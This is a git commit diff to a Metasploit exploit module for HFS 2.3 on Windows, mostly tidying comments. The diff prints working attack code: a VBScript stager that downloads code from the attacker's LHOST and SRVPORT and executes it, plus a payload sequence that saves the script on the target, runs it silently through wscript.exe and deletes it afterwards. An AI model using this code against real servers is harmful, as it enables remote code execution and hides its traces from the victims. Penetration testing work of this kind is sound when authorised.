added proper regex for check function

add comment for changed code
2014-09-19 11:30:51 +08:00 · 2014-09-19 11:30:51 +08:00 · 677d035ce8
parent 978803e9d8
commit 677d035ce8
1 changed files with 10 additions and 5 deletions
--- a/modules/exploits/windows/http/http_file_server_exec.rb
+++ b/modules/exploits/windows/http/http_file_server_exec.rb
@ -57,7 +57,8 @@ class Metasploit3 < Msf::Exploit::Remote
      'uri'    => '/'
    })

-    if res.headers['Server'] =~ /HFS 2\.3/ # added proper regex
+    if res.headers['Server'] =~ /HFS 2\.3/
+    # added proper regex as pointed by wchen
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Safe
@ -69,7 +70,9 @@ class Metasploit3 < Msf::Exploit::Remote
    exe = generate_payload_exe
    vbs = Msf::Util::EXE.to_exe_vbs(exe)
    send_response(cli, vbs, {'Content-Type' => 'application/octet-stream'})
-    remove_resource(get_resource) # remove resource after serving 1st reequest.
+    # remove resource after serving 1st request as 'exec' execute 4x
+    # during exploitation
+    remove_resource(get_resource)
  end

  def primer
@ -77,12 +80,14 @@ class Metasploit3 < Msf::Exploit::Remote
    file_ext = '.vbs'
    file_fullname = file_name + file_ext

-    vbs_code = "Set x=CreateObject(\x22Microsoft.XMLHTTP\x22)\x0d\x0aOn Error Resume Next\x0d\x0ax.Open \x22GET\x22,\x22http://#{datastore['LHOST']}:#{datastore['SRVPORT']}#{get_resource}\x22,False\x0d\x0aIf Err.Number <> 0 Then\x0d\x0awsh.exit\x0d\x0aEnd If\x0d\x0ax.Send\x0d\x0aExecute x.responseText"
+    vbs_code = "Set x=CreateObject(\"Microsoft.XMLHTTP\")\x0d\x0aOn Error Resume Next\x0d\x0ax.Open \"GET\",\"http://#{datastore['LHOST']}:#{datastore['SRVPORT']}#{get_resource}\",False\x0d\x0aIf Err.Number <> 0 Then\x0d\x0awsh.exit\x0d\x0aEnd If\x0d\x0ax.Send\x0d\x0aExecute x.responseText"

    payloads = [
      "save|#{datastore['SAVE_PATH']}#{file_fullname}|#{vbs_code}",
-      #"exec|cmd /q /c start #{datastore['SAVE_PATH']}#{file_name}"
-      "exec|wscript.exe #{datastore['SAVE_PATH']}#{file_fullname}" # using wscript instead of cmd.exe, thanks mubix
+      "exec|wscript.exe //B //NOLOGO #{datastore['SAVE_PATH']}#{file_fullname}",
+      # using wscript.exe instead of cmd.exe, thank mubix
+      "delete|#{datastore['SAVE_PATH']}#{file_fullname}"
+      # delete vbs file after execution
    ]

    print_status("Sending a malicious request to #{target_uri.path}")